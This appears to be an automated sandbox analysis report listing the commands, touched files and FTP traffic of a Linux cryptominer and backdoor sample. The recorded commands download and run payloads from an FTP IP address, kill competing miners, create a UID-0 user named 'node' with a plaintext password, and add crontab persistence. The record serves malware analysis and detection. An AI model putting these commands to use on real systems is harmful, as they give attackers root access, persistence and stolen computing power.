Technical Information
- /var/spool/cron/crontabs/root
- /bin/bash <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
- <SAMPLE_FULL_PATH>
- /bin/bash <SAMPLE_FULL_PATH> -c
- rm -rf .retea
- chmod +x .teaca
- ./.teaca
- mkdir /tmp/.tmp
- rm -rf xmrig
- rm -rf .black xmrig.1
- pkill cnrig
- pkill java
- pkill xmrig
- wget -q ftp://136.144.41.41/.black
- chmod 777 .black
- ./.black
- /bin/bash ./.black -c exec './.black' \"$@\" ./.black
- /bin/bash ./.black -c
- mkdir /var/tmp/.ladyg0g0/
- id -u
- sleep 0.5
- cat /var/tmp/.ladyg0g0/.pr1nc35
- wget -q ftp://136.144.41.41/Opera --no-check-certificate
- ls
- chmod 777 Opera
- cat /etc/passwd
- grep -q node
- /usr/sbin/useradd -u0 -g0 -o -s /bin/bash node
- nscd -i passwd
- nscd -i group
- usermod -aG sudo node
- yes pulamea321!
- passwd node
- grep -q .black
- crontab -l
- rm -rf /tmp/.tmp/.5p4rk3l5
- sleep 1
- crontab /tmp/.tmp/.5p4rk3l5
- chmod 777 /tmp/.tmp/.b4nd1d0
- /tmp/.tmp/./.b4nd1d0
- pgrep -x Opera
- killall java
- killall cnrig
- killall xmrig
- /root/.teaca
- /tmp/.tmp/.black
- /tmp/.tmp/Opera
- /etc/passwd+
- /etc/shadow+
- /etc/subuid+
- /etc/subgid+
- /etc/group+
- /etc/gshadow+
- /etc/nshadow
- /var/spool/cron/crontabs/tmp.jjBcAb
- /tmp/.tmp/.b4nd1d0
- /tmp/.tmp
- /var/tmp/.ladyg0g0
- /etc/passwd.lock
- /etc/group.lock
- /etc/gshadow.lock
- /etc/subuid.lock
- /etc/subgid.lock
- /etc/shadow.lock
- /root/.teaca
- /tmp/.tmp/.black
- /var/tmp/.ladyg0g0/.pr1nc35
- /usr/bin/.locatione
- /tmp/.tmp/Opera
- /etc/.pwd.lock
- /etc/passwd.739
- /etc/group.739
- /etc/gshadow.739
- /etc/subuid.739
- /etc/subgid.739
- /etc/shadow.739
- /etc/passwd-
- /etc/passwd+
- /etc/shadow-
- /etc/shadow+
- /etc/subuid-
- /etc/subuid+
- /etc/subgid-
- /etc/subgid+
- /etc/passwd.744
- /etc/shadow.744
- /etc/group.744
- /etc/gshadow.744
- /etc/group-
- /etc/group+
- /etc/gshadow-
- /etc/gshadow+
- /etc/nshadow
- /tmp/.tmp/.5p4rk3l5
- /var/spool/cron/crontabs/tmp.jjBcAb
- /tmp/.tmp/.b4nd1d0
- /root/.retea
- /tmp/.tmp/xmrig
- /tmp/.tmp/.black
- /tmp/.tmp/xmrig.1
- /etc/passwd.739
- /etc/group.739
- /etc/gshadow.739
- /etc/subuid.739
- /etc/subgid.739
- /etc/shadow.739
- /etc/shadow.lock
- /etc/passwd.lock
- /etc/group.lock
- /etc/gshadow.lock
- /etc/subuid.lock
- /etc/subgid.lock
- /etc/passwd.744
- /etc/shadow.744
- /etc/group.744
- /etc/gshadow.744
- /tmp/.tmp/.5p4rk3l5
- 13#.##4.41.41:64814
- 13#.##4.41.41:11769
- Server: 13#.#44.41.41; Command: USER anonymous \n
- Server: 13#.#44.41.41; Command: PASS -wget@ \n
- Server: 13#.#44.41.41; Command: SYST \n
- Server: 13#.#44.41.41; Command: PWD \n
- Server: 13#.#44.41.41; Command: TYPE I \n
- Server: 13#.#44.41.41; Command: SIZE .black \n
- Server: 13#.#44.41.41; Command: PASV \n
- Server: 13#.#44.41.41; Command: RETR .black \n
- Server: 13#.#44.41.41; Command: SIZE Opera \n
- Server: 13#.#44.41.41; Command: RETR Opera \n
- 13#.##4.41.41:64814
- 13#.##4.41.41:11769